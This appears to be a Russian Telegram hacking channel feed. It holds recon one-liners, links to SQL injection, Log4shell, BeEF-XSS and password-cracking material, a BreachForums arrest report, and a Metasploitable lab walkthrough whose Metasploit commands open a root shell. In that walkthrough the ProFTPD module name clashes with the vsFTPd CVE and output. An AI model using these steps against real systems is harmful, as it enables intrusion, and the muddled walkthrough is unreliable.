Forwarded from Kali Linux
Приготовьтесь к путешествию в “кроличью нору” бинарных файлов Linux. Мы заглянем в самые потаенные уголки /usr/bin и исследуем уникальные и интересные программы, смахнув с них пыль времен как с затерянных драгоценных камней.
На первый взгляд они могут показаться устаревшими, однако это не так. Они все еще представляют собой весьма полезный инструмент для программиста.
Откроем же для себя еще больше удивительных утилит, которые таит Linux.
▪Читать
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Хотел бы узнать ваше мнение 👾
Идея ролика: Beef-xss как могут взломать через ссылку
Идея ролика: Beef-xss как могут взломать через ссылку
Anonymous Poll
86%
Нормальная
9%
Такое
5%
Не очень
Новый ролик уже на канале 👇🏻
https://m.youtube.com/watch?v=E7KFVT5ELtY
https://m.youtube.com/watch?v=E7KFVT5ELtY
YouTube
ВЗЛОМ ЧЕРЕЗ ССЫЛКУ Beef-XSS | Kali Linux Parrot OS Termux
В этом ролике я расскажу как вас могут взломать через ссылку с помощью Beef-XSS который уже установлен в Kali Linux.
ТГ КАНАЛ: https://t.me/HelloHackingTeam
ДС СЕРВЕР: https://discord.gg/Eg8aDS7Hn7
Стикеры из ролика:
https://t.me/addstickers/Social_Engineering
ТГ КАНАЛ: https://t.me/HelloHackingTeam
ДС СЕРВЕР: https://discord.gg/Eg8aDS7Hn7
Стикеры из ролика:
https://t.me/addstickers/Social_Engineering
👍1
Forwarded from Этичный Хакер
Сегодня в этой статье мы рассмотрим одну из наиболее часто используемых сетевых утилит и узнаем, как другие фреймворки используют Netcat для создания сеанса.
#netcat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from PAINtest
Последние три дня багхантил и собрал несколько полезных однострочников для рекона и поиска базовых уязвимостей.
Для поиска поддоменов:
https://github.com/dwisiswant0/awesome-oneliner-bugbounty
#bugbounty #bugbountytips #recon #tools
Для поиска поддоменов:
curl -s "https://crt.sh/?q=*DOMAIN*&output=json" | jq -r '.[].common_name' | sed 's/\*//g' | sort -uИзвлекаем все URL-ы из APK-файла:
apktool d base.apk -o baseAPK -f; grep -Phro "(https?://)[\w\,-/]+[\"\']" baseAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"Проверка корректности CORS:
curl -s -I -H "Origin: yourdomain.com" -H "Access-Control-Request-Method: GET" -H "Access-Control-Request-Headers: X-Requested-With" -X OPTIONS https://example.comА затем обнаружил, что существует репозиторий, содержащий не один десяток подобных полезных скриптов, пользуйтесь на здоровье :)
https://github.com/dwisiswant0/awesome-oneliner-bugbounty
#bugbounty #bugbountytips #recon #tools
GitHub
GitHub - dwisiswant0/awesome-oneliner-bugbounty: A collection of awesome one-liner scripts especially for bug bounty tips.
A collection of awesome one-liner scripts especially for bug bounty tips. - dwisiswant0/awesome-oneliner-bugbounty
🤔1
Forwarded from Этичный Хакер
Полный дамп базы данных и получения данных пользователей с помощью Error Based SQL и обхода защиты веб приложения.
#Web #SQL |
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Этичный Хакер
log4shell.gif
5.1 KB
В статье представлен поиск однажды нашумевшей уязвимости Log4shell на одном из сервисов Google.
#Web #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Этичный Хакер
В статье представлен полный гайд по тестированию на проникновение базы данных с помощью инструмента sqlmap.
#Web #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
В США арестовали владельца популярного киберпреступного портала BreachForums
Правоохранительные органы США арестовали 15 марта жителя Нью-Йорка, предположительно Помпомпурина, владельца хакерского форума BreachForums. Согласно судебным документам , ему было предъявлено обвинение в сговоре с целью склонения физических лиц к продаже устройств несанкционированного доступа.
По данным сотрудников ФБР, во время ареста подсудимый признался, что его настоящее имя Коннор Брайан Фитцпатрик, и что он — Помпомпурин, владелец форума киберпреступного форума BreachForums.
16 марта Фитцпатрик был освобожден под залог в размере 300 тысяч долларов. Он предстанет перед Окружным судом Восточного округа Вирджинии 24 марта. Помпомпурин сдал свои документы, сейчас ему разрешено перемещаться только в пределах Южного и Восточного округов Нью-Йорка и Восточного округа Вирджинии. Ему также запрещено контактировать со свидетелями, сообвиняемыми или сообщниками.
Один из администраторов BreachForums уже заявил, что сайт продолжит работать в штатном режиме несмотря на ситуацию с Помпомпурином. По его словам, полный доступ к инфраструктуре сайта есть не только у его владельца, но и у остальных администраторов.
Помпомпурин был известным игроком в киберпреступном подполье, занимающимся взломом компаний, а также сливом и продажей украденных данных через форумы и социальные сети. Он также был известным участником киберпреступного форума RaidForums, захваченным ФБР в 2022 году.
Именно после деактивации RaidForums Фитцпатрик создал портал BreachForums, который очень быстро стал крупнейшим в своем роде форумом по утечке данных. Портал активно используется хакерами и бандами вымогателей для слива и продажи украденных данных. В одном только марте мы писали о сливе данных одного из крупнейших немецких банков , а также о массивной 160 гигабайтной утечке внутренней информации Acer.
Правоохранительные органы США арестовали 15 марта жителя Нью-Йорка, предположительно Помпомпурина, владельца хакерского форума BreachForums. Согласно судебным документам , ему было предъявлено обвинение в сговоре с целью склонения физических лиц к продаже устройств несанкционированного доступа.
По данным сотрудников ФБР, во время ареста подсудимый признался, что его настоящее имя Коннор Брайан Фитцпатрик, и что он — Помпомпурин, владелец форума киберпреступного форума BreachForums.
16 марта Фитцпатрик был освобожден под залог в размере 300 тысяч долларов. Он предстанет перед Окружным судом Восточного округа Вирджинии 24 марта. Помпомпурин сдал свои документы, сейчас ему разрешено перемещаться только в пределах Южного и Восточного округов Нью-Йорка и Восточного округа Вирджинии. Ему также запрещено контактировать со свидетелями, сообвиняемыми или сообщниками.
Один из администраторов BreachForums уже заявил, что сайт продолжит работать в штатном режиме несмотря на ситуацию с Помпомпурином. По его словам, полный доступ к инфраструктуре сайта есть не только у его владельца, но и у остальных администраторов.
Помпомпурин был известным игроком в киберпреступном подполье, занимающимся взломом компаний, а также сливом и продажей украденных данных через форумы и социальные сети. Он также был известным участником киберпреступного форума RaidForums, захваченным ФБР в 2022 году.
Именно после деактивации RaidForums Фитцпатрик создал портал BreachForums, который очень быстро стал крупнейшим в своем роде форумом по утечке данных. Портал активно используется хакерами и бандами вымогателей для слива и продажи украденных данных. В одном только марте мы писали о сливе данных одного из крупнейших немецких банков , а также о массивной 160 гигабайтной утечке внутренней информации Acer.
Forwarded from Kali Linux
Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.
Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.
#Metasploitable
Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.
#Дисклеймер
Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!
А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.
Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.
#Nmap
Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.
Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он - 192.168.1.131.
#Начало сканирования
Пишем в kali linux следующую компанду:
💣sudo nmap -sV -Pn --script vulners 192.168.1.131
Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.
Флаг Pn означает, что мы не отправим ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.
#Выбор уязвимости
Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.
#msfconsole
Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:
💣search ftp
💣use exploit unix/ftp/proftpd133cbackdoorВыбираем полезную нагрузку. Я выбрал cmd/unix/interact.
💣
Set payload payload/cmd/interact.
💣set RHOSTS 192.168.1.131Тут как вы понимаете ip metasploitable в локалке.
💣Exploit
И видим следующее:
192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)
* 192.168.1.131:21 - USER: 331 Please specify the password.
+ 192.168.1.131:21 - Backdoor service has been spawned, handling...
+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)
* Found shell.
* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)И вот у вас есть обратная оболочка. Причем она даже root оболочка! Так что никаких повышений привилегий не надо.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Этичный Хакер
😈 Hakrawler - быстрый CLI веб-сканер для хакеров
В этой статье рассмотрим инструмент, являющимся быстрым веб-сканер golang для сбора URL-адресов и местоположений файлов JavaScript.
➖ https://telegra.ph/Hakrawler---bystryj-CLI-veb-skaner-dlya-hakerov-03-21
#Web #CLI
В этой статье рассмотрим инструмент, являющимся быстрым веб-сканер golang для сбора URL-адресов и местоположений файлов JavaScript.
➖ https://telegra.ph/Hakrawler---bystryj-CLI-veb-skaner-dlya-hakerov-03-21
#Web #CLI
Forwarded from GreyTeam | Хакеры
«Zydra – это инструмент, который может восстанавливать пароли от файлов и shadow файлов (shadow файл хранит пароли пользователей в системе Linux) Linux с помощью перебора или атаки по словарю.»
#pentest
https://telegra.ph/Legkij-vzlom-parolej-ZIP-fajlov-s-pomoshchyu-Zydra-03-28
#pentest
https://telegra.ph/Legkij-vzlom-parolej-ZIP-fajlov-s-pomoshchyu-Zydra-03-28
Telegraph
Легкий взлом паролей ZIP-файлов с помощью Zydra
Zydra – это инструмент, который может восстанавливать пароли от файлов и shadow файлов Linux с помощью перебора или атаки по словарю. То есть, он может взламывать пароли файлов ZIP, RAR и PDF. Также он может восстанавливать пароли систем Linux с помощью shadow…
👍1
Forwarded from RESOLUTE ATTACK
This media is not supported in your browser
VIEW IN TELEGRAM
Active Scan++
HTTP Request Smuggler
JSON Beautifier
Sitemap Extractor
Param-Miner
JSON Web Tokens
Autorize
Retire-JS
Param Miner
BurpJSLinkFinder
BurpBounty
domain_hunter
Turbo Intruder
RESOLUTE ATTACK
#Разное #BurpSuite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Social Engineering
• Хакеры начинают искать уязвимые эндпоинты уже через 15 минут, после раскрытия данных о CVE. Дело в том, что они постоянно мониторят сообщения от поставщиков и производителей ПО в поисках объявлений о новых уязвимостях, которые можно было бы использовать для начального доступа к корпоративной сети или удаленного выполнения кода.
🖖🏻 Приветствую тебя user_name.
• Часто нужно узнать всю информацию о какой-нибудь уязвимости: насколько найденный баг критичен, есть ли готовые сплоиты, какие вендоры уже выпустили патчи, каким сканером проверить наличие бага в системе и т.д. Для этих потребностей есть не мало инструментов и *ресурсов, о которых ты сегодня узнаешь:• MITRE CVE — база данных, поисковик и классификатор уязвимостей.
• opencve.io — поисковик CVE с функционалом оповещений о новых угрозах.
• Vulnerability Database — ресурс для поиска информации об актуальных угрозах.
• sploitus — поисковик по эксплойтам и необходимым инструментам инструментам.
• CVE Trends — ресурс, который отслеживает популярность CVE в реальном времени.
• GitHub Advisory Database — БД уязвимостей, включающая CVE и рекомендации по безопасности.
• Exploit DB — CVE-совместимый архив общедоступных эксплойтов и уязвимого программного обеспечения.
• Cloudvulndb — проект, который аккумулирует уязвимости и проблемы безопасности поставщиков облачных услуг.
• CVEDetails, osv.dev, VulDB, maltiverse — источники данных об уязвимостях и индикаторах компрометации.
• security.snyk.io и Mend Vulnerability Database, Vulncode-DB — БД уязвимостей с открытым исходным кодом.
• Rapid7 - DB — база данных, которая содержит детали более чем 180 тыс. уязвимостей и 4 тыс. эксплойтов. Все эксплойты включены в Metasploit.
*Список ресурсов не претендует на полноту.
S.E. ▪️ S.E.Relax ▪️ infosec.work
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1
Новый ролик уже на канале!
Торопись! Ссылка 👇🏻
https://youtu.be/oatEzIQHvlY
Напишите комментарии, как вам такая подача!
Торопись! Ссылка 👇🏻
https://youtu.be/oatEzIQHvlY
Напишите комментарии, как вам такая подача!
YouTube
РАЗВЕДКА, ДЕАНОН В ИНТЕРНЕТЕ : OSINT, VENATOR | Kali Linux Parrot OS Termux
В этом видео мы поговорим про разведку и пробив в интернете. Как найти своего старого друга :)
ТГ КАНАЛ: https://t.me/HelloHackingTeam
ДС СЕРВЕР: https://discord.gg/Eg8aDS7Hn7
ТГ КАНАЛ: https://t.me/HelloHackingTeam
ДС СЕРВЕР: https://discord.gg/Eg8aDS7Hn7
👍1
Forwarded from Kali Linux
Не много отойдём от темы уязвимостей и поговорим про классный сканер уязвимостей веб приложений под названием Zap.
#Дисклеймер
Но перед тем как мы начнем. Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!
#FAQ
OWASP Zap - это среда тестирования безопасности, очень похожая на Burp Suite. Он действует как очень надежный инструмент для подсчета. Он используется для тестирования веб-приложений.
Почему бы мне не использовать Burp Suite?
Это хороший вопрос! Большинство людей в сообществе Info-sec ДЕЙСТВИТЕЛЬНО используют Burp Suite. Но OWASP ZAP имеет несколько преимуществ и функций, которых нет в Burp Suite, и это моя предпочтительная программа из двух.
#Преимущества OWASP ZAP?
Это полностью открытый исходный код и бесплатный. Нет премиум-версии, никаких функций, заблокированных за платный доступ, и нет проприетарного кода.
#Установка
OWASP ZAP имеет удобный установщик для систем Windows, Mac OS и Linux.
Скачайте и установите с официального сайта: https://www.zaproxy.org/download/
#Автоматичесское сканирование
Автоматическое сканирование позволяет нам выявить базовые уязвимости в веб приложении. Смысл в том, чтобы данное программное обеспечение помогло вам увидеть ни только уязвимости но и карту сайта.
ZAP сканирует сайт с помощью "Паука" и даже имеет возможность работать через прокси. Произвести автоматическое сканирование легко. Для этого достаточно просто нажать на кнопку "Automated Scan" вставить ссылку на нужный сайт в специальное окно и нажать Start.
#Ручное сканирование
Мы можем просканировать сайт в ручную, просто настроив прокси сервер однако для этого надо так-же как и в Burp Suite скачать ZAP сертификат и импортировать его в наш браузер.
На этом пока все. Скоро расскажу вам про особенные фишки ZAP и почему он немного больше чем просто сканнер.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM